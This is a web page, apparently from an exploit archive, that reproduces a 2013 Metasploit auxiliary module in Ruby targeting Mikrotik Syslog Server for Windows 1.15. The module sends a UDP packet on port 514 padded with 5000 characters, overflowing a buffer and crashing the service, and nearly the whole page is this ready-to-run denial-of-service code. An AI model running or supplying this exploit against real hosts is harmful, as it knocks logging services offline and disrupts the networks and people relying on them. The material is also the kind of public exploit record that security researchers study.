扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 |
# Exploit Title: Mikrotik Syslog Server for Windows - remote BOF DOS # Date: 19.04.2013 # Exploit Author: xis_one@STM Solutions # Vendor Homepage:www.mikrotik.com # Software Link: http://www.mikrotik.com/download/MT_Syslog.exe # Version: 1.15 (most recent version 19.04.2013) # Tested on: Windows XP SP3, Windows 7 SP1 require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos def initialize super( 'Name'=> 'Mikrotik Syslog Server for Windows - remote BOF DOS', 'Description' => %q{ This module triggers the windows socket error WSAEMSGSIZE (message to long) in the Mikrotik Syslog Server for Windows v 1.15 and crashes it. The long syslog message overwrite the allocated buffer space causing the socket error. }, 'Author'=> 'xis_one@STM Solutions', 'License' => MSF_LICENSE, 'DisclosureDate' => 'Apr 19 2013') register_options( [ Opt::RPORT(514) ]) end def run connect_udp pkt = "<0>" + "Apr19 " +"10.0.0.2 " + "badass" + ": " + "A"*5000 print_status("Crashing the remote Mikrotik syslog server #{rhost}") udp_sock.put(pkt) disconnect_udp end end |
体验盒子
